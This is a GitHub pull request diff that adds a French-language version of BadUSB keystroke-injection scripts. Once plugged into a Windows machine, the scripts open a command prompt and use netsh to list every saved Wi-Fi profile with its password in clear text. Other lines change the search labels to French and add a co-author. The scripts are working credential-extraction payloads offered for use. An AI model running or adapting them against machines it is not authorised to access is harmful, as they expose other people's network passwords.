Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add French Windows version for Wifi_password_script #8

Open
wants to merge 6 commits into
base: main
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion badusb/Passwords/Saved_Passwords_Win.txt
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
REM Title: Passwords Extractor
REM Author: Jeffrey Koopman | JKCTech
REM Author: Jeffrey Koopman | JKCTech + (Ianis Pouru | MrIanis)
REM Description: Extracts saved passwords and lists them.
REM Original: https://github.com/UberGuidoZ/Flipper/blob/main/BadUSB/Show_Saved_Passwords.txt
REM Target: Windows
Expand Down
2 changes: 1 addition & 1 deletion badusb/Passwords/WiFi_Passwords_Win.txt
Original file line number Diff line number Diff line change
Expand Up @@ -12,5 +12,5 @@ ENTER
DELAY 2000
STRING cls
ENTER
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"Nom du SSID" /C:"Contenu de la clé"
ENTER
16 changes: 16 additions & 0 deletions badusb/Passwords/Wifi_password_WIN-FR.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
REM Title: WiFi Passwords Extractor (French)
REM Author: Jeffrey Koopman | JKCTech + (Ianis Pouru | MrIanis)
REM Description: Extracts WIFi passwords and lists them.
REM Original: https://github.com/UberGuidoZ/Flipper/blob/main/BadUSB/Show_WiFi_Passwords.txt
REM Target: Windows : French
REM
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
STRING cls
ENTER
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"Nom du SSID" /C:"Contenu de la clé"
ENTER